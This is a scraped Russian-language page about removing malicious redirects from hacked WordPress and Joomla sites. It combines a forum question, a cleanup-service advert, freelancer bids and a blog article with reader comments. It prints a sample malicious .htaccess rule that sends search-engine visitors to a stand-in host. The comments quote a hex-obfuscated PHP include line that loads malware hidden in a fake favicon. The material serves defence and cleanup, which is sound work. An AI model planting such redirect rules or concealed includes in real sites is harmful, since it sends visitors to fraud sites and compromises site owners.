Как убрать редирект на вирусные сайты
Перейти к содержимому

Как убрать редирект на вирусные сайты

  • автор:

Как устранить вирус go.php?redirect на сайте WordPress?

В Search Console постоянно появляются новые страницы с редиректом на порно сайты. Все адреса содержат редирект go.php?redirect. Сам движок WordPress и шаблон обновлял до последней версии. В базе данных и в файлах сайта не нашел go.php?redirect. Где может сидеть вредоносный скрипт?

635e8e17a3fe2013950865.png

  • Вопрос задан более года назад
  • 163 просмотра

Комментировать

Решения вопроса 0

Ответы на вопрос 1

pro100taa

Ответ написан более года назад

Комментировать

Нравится Комментировать

Ваш ответ на вопрос

Войдите, чтобы написать ответ

wordpress

  • WordPress
  • +1 ещё

Можли ли в плагине настроить отправку результатов опроса в мессенджер?

  • 1 подписчик
  • 5 часов назад
  • 32 просмотра

Как обезвредить вирус редирект на сайте

Вирус редирект на сайте

Вирусдай позволяет удалить вирус-редирект с вашего сайта. Редирект – это перенаправление пользователя на сторонний сайт при попытке просмотра страниц исходного сайта. Обычно такие редиректы перенаправляют пользователей на сайты, откуда происходит распространение вредоносного или мошеннического ПО (например, под видом обновления к веб-браузеру). Загрузка и установка таких программ может привести к заражению компьютера или вашего мобильного устройства.

В большинстве случаев, вредоносный код прописывается в файле .htaccess, лежащем в корне вашего сайта. Вредоносный код, часто выглядит следующим образом:
RewriteEngine On
RewriteCond % .*yandex.* [OR]
RewriteCond % .*google.* [OR]
RewriteCond % .*bing.* [OR]
RewriteRule ^(.*)$ http://maliciouswebsite.net/index.php?t=6 [R=301,L]

Такие правила редиректа будут перенаправлять пользователей с поисковых систем Яндекс, Гугл и Бинг на сайт maliciouswebsite.net.
Часто распространены мобильные редиректы, влияющие только на пользователей, посещающих ваш ресурс с мобильных устройств.

Лечение от вируса

Мы рекомендуем воспользоваться сервисом Вирусдай, умеющим автоматически находить и удалять вредоносные редиректы. Если вы хотите произвести удаление вручную — инструкции следующие:
1. Установите соединение со своим сайтом через файл-менеджер по FTP
2. Найдите файл .htaccess в корневом каталоге сайта
3. Удалите вредоносный код и сохраните файл

Теперь, когда редирект удален, вы, казалось бы, можете вздохнуть спокойно, однако, вы не знаете как и кем он был помещен в ваш файл и уж точно не знаете повторится ли это снова, однако, вы явно подозреваете, что да. Осталось постараться найти уязвимость, через которую лоумышленникам удалось проникнуть в файлы вашего сайта. Вирусдай может находить и уничтожать шеллы, дающие злоумышленникам полный доступ к вашим файлам.

Вирус редирект в PHP-файлах

Есть разновидности редиректов, которые любят прописываться не только в самом файле .htaccess, но также, легко позволяют себе прописаться во множестве (сотни или тысячи файлов) PHP файлов. В явном виде вы не сможете обнаружить такую вредоносную строку в файлах, однако, при запуске любого из PHP файлов редирект на вашем сайте будет снова возникать. Для полного устранения вирусда редиректа рекомендуем использовать сервис Вирусдай. Вирусдай обнаруживает и удаляет редиректы в .htaccess и файлах *.php.

Команда сервиса Вирусдай.

Убрать редирект с WordPress сайта (вирус, вредоносный код)

Происходит перенаправление посетителей на другой сайт (перенаправляет выборочно, мобильные устройства).
Новые плагины не ставились, но в администраторах были странные учетные записи.
Необходимо найти и удалить вредоносный код и предотвратить повторный взлом/заражения.

1 день 200 UAH

1 день 200 UAH

Доброго дня.
Великий досвіт у веб розробці.
Вирішував схожі проблеми.
Розпочав наповнювати профіль, тому за чисто символічну суму допоможу вирішити дану проблему.
Майте на увазі, що після вичищення шкідливого коду, буде необхідно змінити всі доступи до сайту (хостинг, бази даних, фтп, адмінка)

2 дня 375 UAH

2 дня 375 UAH

Помогу решить Вашу проблему с тем, что сайт перенаправляет на рекламные площадки пользователей. Обращайтесь

2 дня 1200 UAH

2 дня 1200 UAH

Здравствуйте.
Вылечил не одну сотню сайтов. Удалю вредоносные файлы, вычищу зараженные, предприму некоторые меры для предотвращения подобного. Гарантий от последующих заражений дать не могу, так как не от меня это зависит. Нужно обновлять движок, модули, шаблон и т.п.
—-
Моё портфолио BlackCat.com.ua (или BceMoe.ru).

1 день 500 UAH

1 день 500 UAH
Здравствуйте, готов почистить ваш сайт от вируса. Обращайтесь, буду рад помочь.
1 день 300 UAH

1 день 300 UAH

Здравствуйте. Готов взяться за проект. Опыт работы с WordPress более 7 лет. Удалю вирусы так как делал это не раз. Делаю качественно и даю гарантию.
Пишите

1 день 1300 UAH

1 день 1300 UAH

Здравствуйте. Готов заняться сейчас!
Лечение и защита сайта — ПОЖИЗНЕННАЯ ГАРАНТИЯ!

У меня больше 150 положительных рекомендаций!

Что я сделаю:
1. Удалю вирусы и шелы.
2. Решу проблему с рассылкой спама.
3. Обновлю вашу CMS, и скрипты. Закрою дыры.
… 4. Установлю системы защиты от взлома.
5. Бесплатная консультация по безопасности.
По срокам 1 день.

Установлю систему проверки сайта на вирусы.
Проверка раз в сутки — по самым популярным антивирусам.

Цена на комплекс услуг за 1 сайт 49$.
Скидки при заказе 3х и более сайтов.
Оплата возможна: ЯД, QIWI, WebMonew, Банковской картой онлайн.
Принимаю: ₽, ₴, $, € .

Гарантия:
Первый вариант: Гарантия на 1 год. (если остаетесь на вашем хостинге)
Второй вариант: ГАРАНТИЯ ПОЖИЗНЕННО. (при переносе на хостинг с повышенной защитой)

Обращайтесь с ув. Дмитрий!

Как удалить вирус редиректа с сайта

Как удалить вирус редиректа с сайта

Никакой владелец сайта не захочет, чтобы траффик с его сайта уходил через редирект к неизвестным сайтам — это неинтересно как клиентам, подрывает доверие покупателей и вызывает санкции поисковых систем и антивирусов.

Удаление вируса редиректа на сайте

В данной статье я рассмотрю основные варианты встраивания вирусных редиректов.

Внимание! Удаляя редирект, Вы удаляете лишь следстствие, для того, чтобы ситуация не повторилась, Вам стоит искать причину попадания вирусов на сайт!

Кроме этого, вредоносные редиректы плохо детектируются сканерами и антивирусами, что зачастую приходится искать вручную источник зла.

В первую очередь ищем вставки кода в файлы .htaccess, особенно в корне сайта

Все что связано с Rewrite стоит проверить, куда перенаправляет.

Ниже я приведу пару вредоносных вставок — которые создают дорвеи и тысячи страниц в поиске, так называемый японский спам (сео-спам, страницы с иероглифами — тут много названий):

Если увидите что-то подобное — смело можно удалять, если сомневаетесь, какие строки можно оставить, то возьмите стандартный файл вашей CMS — там не будет находиться вирус!

Обычно редиректы прописывают для запросов с мобильных и планшетов:

android|plucker|pocket|psp|symbian|treo|vodafone|wap и другие вариации мобильных заголовков

как и для переходов с поисковых систем:

Если этот пункт не помог, то стоит обратить внимание на код страницы — порой часто редирект добавляют через Javascript

Чтобы избавиться от вредоносного кода может понадобиться массовая замена всех .js файлов.

Обязательно проверяйте индексные файлы и папку шаблона — это излюбленные места хакеров для вирусов. Особенно тщательно пройдитесь по файлам index.php, footer.php, head.php, header.php — в последнее время популярно стало размещать сами вирусы не в них, а в виде ссылок. Поэтому внимательно проверяйте, какие файлы подгружаются посредством команд include и require.

Самые изощренные вставки делаются уже в подгружаемые модули, плагины и компоненты. Это могут быть как отдельно внедренные модули (особенно если была взломана админка), так и просто вставки зашифрованного кода в файлы известных и популярных расширений.

К примеру, в последнее время встречаю не один сайт на джумле ( в частности на Joomla 2.5), где по пути includes/inc.class.php находится сам вирус, а в файл application.php в этой же папке вставлена следующая строка

Обычно параллельно с этим libraries/joomla/appplication находится вирус редиректа с именем joomla-app.php

В любом случае, если заметили на сайте перенаправление на сторонний сайт, то обязательно стоит предпринять меры безопасности и проверять весь сайт. Если сами не можете справитья, то обязательно стоит обратиться к специалистам по удалению вирусов и защите сайтов.

  • Удаление следов Joomla на сайте
  • Как правильно обновить Drupal

Комментарии
+2 # Надежда 27.06.2016 04:54
Может лучше программу айболит запустить? Сайт моего клиента именно так вылечил хостер
+3 # Protect Your Site 27.06.2016 06:10

Надо понимать, что такой вариант лечения может в зависимости от настроек ( на хостинге скорее всего будут упрощенные) удалить или не все ирусы, или удалить лишние файлы. Кроме этого, удаление вирусов без устранения уязвимости — это дохлый номер, через пару дней можно будет снова удалять по новой!

0 # Виктор 04.01.2017 10:47

У меня ситуация следующая на сайте клиента появился вирус редирект, сайт на WordPress, появилась куча левых страниц в выдаче, при переходе по которым они редиректят на сайт essayoneday.com , как вылечить помогите пожалуйста.

+1 # Protect Your Site 04.01.2017 11:24
Если не знаете как, то можете заказать услугу чистки сайта и ваш сайт будет быстро защищен.
0 # Влад 14.02.2017 19:39
Именно ТАМ и БЫЛ КОД. Спасибо. Вы супер.
0 # руслан 01.04.2017 12:30

У меня такая фигня произошла с сайтом. Сделал бекап, но даже он не помог решить проблему. В чем дело, не понимаю..

-1 # Protect Your Site 01.04.2017 18:10

Что подробнее и почему бекап должен исправить проблему? Распространенна я ошибка надеяться на резервную копию, надо исправлять корень проблемы — закрывать уязвимость и удалять вирусы, а потом желательно накатить ещё защиту, и тогда хакеры не позарятся на Ваш сайт.

+1 # Коля 18.04.2017 10:20

У меня в папке «aiowps_backups » в файле «.htaccess.back up» странный код:
«@include «\x2fho\x73ti\x 6eg/\x74eh\x6eo h\x65l/\……и т.д.»
как вы думаете. это вирус?
Перенаправление идут на другие сайты и не могу найти где эта зараза сидит. Сайт на WP

+1 # Protect Your Site 18.04.2017 10:26

Очень похоже на то, с учетом, что символом @ подавление ошибок делается, дабы не вызывать подозрений.
В самую первую очередь проверяйте файлы шаблона и wp-blog-header. php

0 # Коля 18.04.2017 11:20

Спасибо за быстрый ваш ответ!
Извиняюсь, а Вы не знаете, как можно раскодировать этот код и посмотреть, что было там прописано? Хочу узнать на какие файлы он ссылается еще

+1 # Protect Your Site 18.04.2017 11:29
Вышлите на почту в архиве файл, здесь посторонний код просто обрежется.
0 # Коля 18.04.2017 12:01

Да, не, вроде как не режиться код:
Код: @include «\x2fho\x73ti\x6eg/\x74eh\x6eoh\x65l/\x64at\x61/w\x77w/\x74eh\x6eoh\x65lp\x2eco\x6d.u\x61/w\x70-i\x6ecl\x75de\x73/R\x65qu\x65st\x73/R\x65sp\x6fns\x65/f\x61vi\x63on\x5f7e\x62f8\x33.i\x63o»;

+3 # Protect Your Site 18.04.2017 12:15
/hosting/****** ***/data/www/si te/wp-includes/ Requests/Respon se/favicon_7ebf 83.ico
0 # Коля 18.04.2017 12:20
Спасибо! Если не секрет, как Вы перекодировали?
+2 # Protect Your Site 18.04.2017 12:27
Заменил @include на echo и вызвал скрипт)
+2 # Коля 18.04.2017 12:31

хм, так все просто оказалось ))) А я тут мудрю.
Но мне все равно не понятно, зачем вирусу создавать фавикон и потов размещать на сайте?
Это мой последний вопрос, и так я очень сильно Вам благодарен за потраченное Вами время на меня!

+2 # Protect Your Site 18.04.2017 12:35

Проверьте содержимое файла wp-includes/Req uests/Response/ favicon_7ebf83. ico — многие антивирусы игнорируют изображения для проверки. А через функцию include без разницы в каком расширении подключать файл, если там будет исполняемый код, то он запустится.

0 # Коля 18.04.2017 12:54

Да, вы правы, открыл блокнотом фавикон и там был прописан вирус в закодированном виде «64_decode».
Спасибо! Буду теперь искать каким образом все это туда попало
Еще раз спасибо!

0 # Коля 18.04.2017 11:17

Спасибо!
Вы имеете ввиду проверить тему?
Если проверить файлы темы, то там был один лишний файлик «proxi.php».

+1 # Protect Your Site 18.04.2017 11:23

Проверять надо все файлы на сайте, а если сайтов несколько на аккаунте, то и все сайты.
К файлам темы надо тщательнее отнестись и лучше вручную открыть и просмотреть код, обратить внимание на подключение внешних файлов через include и require

0 # Natalya 23.06.2017 17:06

У меня был такой! Один в один, он и еще и размножался сам. Не знала, как победить его. Вычищала и руками, и муж бекап делал, и к хостеру обращались. Они тоже чистили своими способами. Наконец, ушло. Теперь даже в админку боюсь сама входить — фобия на вирусы появилась

-1 # liza 01.03.2018 14:12

не подскажите что это за папка

вот полный путь до папки

в файле .htaccess

order deny,allow
deny from all

в файле .htaccess.backup

RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ — [L]
RewriteCond % !-f
RewriteCond % !-d
RewriteRule . /index.php [L]

order allow,deny
deny from all

в файле index.html

там пусто никаких записей нет

0 # Protect Your Site 01.03.2018 15:11
Это папка плагина All In One WP Security, там ничего страшного нету!
0 # liza 01.03.2018 15:18

Подскажите пожалуйста если можно, что еще можно было бы поставить с связке с

All In One WP Security

какой нибудь сканер, если были изменения в файлах и автоматически сканировал сайт, буквально все что бы можно было бы обезопасить сайт?

Сделать такую связку чтобы они не конфликтовали между собой

0 # Protect Your Site 01.03.2018 16:19

Можно поставить в крон что-то типо https://github.com/lucanos/Tripwire — это контролирует, какие файлы меняются, но изменяемые файлы придется проверять вручную. А так больше бесплатных аналогов нету.

0 # liza 01.03.2018 20:35
Цитирую Protect Your Site:
А так больше бесплатных аналогов нету.

Начала заниматься с вордпресс совсем недавно, и как этот движок самый распространенны й то ломают его часто, хотелось бы как сказать во все оружие встретить если что
Вроде бесплатных много есть плагинов, но не ставить же все подряд, чтобы конфликта не было
Если есть мысль было бы хорошо

Насчет крона это не про меня, не настолько понимаю

В любом случае спасибо что подсказали

0 # Protect Your Site 02.03.2018 08:00

Регулярно обновляйтесь, не ставьте варезные темы и плагины, настройте безопасность вордпресса по статье https://protectyoursite.ru/полезные-материалы/удаляем-следы-wordpress-с-сайта и не нужны будут вам лишние плагины, тормозящие сайт.

0 # Кирилл 05.11.2018 06:42

Добрый день всем.
Пишу из за того что не знаю что уже делать. у меня на сайтах укакой то вирус который делает редирект с них. только в том случае если человек перрвый раз переходит из поисковиков путем нажатия на ссылку ведущую на мой сайт.

— Человек не попадает ко мне а сперва на сайт лохотрон — http://reposted.pro (ранее перенаправляло на pay.wew.ru они сменили домен) смотрите как это происходит — https://youtu.be/JQNkwBtZbX8 на хостинге прошу помощи уже много дней, что то погли выяснить из онлайн поддержки, техническая поддержка отмахивается и помогать не хочет, дескать это не наша проблема.

— Дело в том что эта «зараза» распростроняетс я и на поддомене.
Мы уже все снесли, все конструкторы и установили сайты заново, чистые аккуратно и без вируса, становится понятно что дело не в сайтах, не в их коде, Свои пк Ноутбук проверены разными антивирусами, но все ровно идет редирект, мы выходили специально даже от друзей, где они вообще ни имею отношения к нашим сайтам, но и там все происходит как на ролике выше. остается только один голый домен. помогите пожалуйста решить эту проблему, у меня весь трафик уходит налево, да ладно если бы просто уходил, так он ведет на проверенны лохотрон, люди страдают.

Я уже не сплю долгое время.
Да, и проверял на редирект разными сервисами в сети (бесплатными),
пишет редирект не обнаружен, Но когда проверяли вот этим https://www.revisium.com/ai/
онлай сканером, редирект был выявлен,

вот сам домен — http://joxi.ru/ZrJZYLdi9xOzlr
вот его первый поддомен — http://joxi.ru/MAjxoPbC4NJO6m
второй поддомен — http://joxi.ru/MAjxoPbC4NJK6m (этот совсем свежий, еще не прошла его полная установка) везде один и то же лохотронский сайт.

и так на всех моих сайтах и их поддоменах.
Я точно знаю что дело не в сайтах и не моих ПК.
Дело в самих доменах. Помогите прошу люди решить эту задачу.

0 # Protect Your Site 05.11.2018 07:14

Добрый день!
У вас проблема в том, что сайты не изолированы друг от друга. Именно поэтому за минуту спокойно перезаражаются остальные сайты. Когда сайты будут разнесены друг от друга, тогда и надо каждый сайт пролечивать и устранять уязвимости.

0 # Кирилл 05.11.2018 07:29

дело не в сайтах еще раз повторюсь. были снесены все конструкторы. установлены сайты на глый домен. как может быть заражен сам домен? поддомены понятно, они ссылаются в первую очередь на сам домен, тем самым и цепляют первое перенаправление . дело все в соновном домене.

0 # Protect Your Site 05.11.2018 08:04

Домен не может заражать сам по себе.
Вы нашли уязвимость, чтобы утверждать, что проблема в домене?
С чего Вы уверены, что изначально устанавливаете без вируса?
То, что сносили конструкторы, ничего не значит, вариантов попадания вирусов множество — от заражения хостинга до атак по уязвимостям.
Настоятельно рекомендую Вам обратиться к специалистам безопасности на платной основе, если сами не можете справиться с проблемой.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *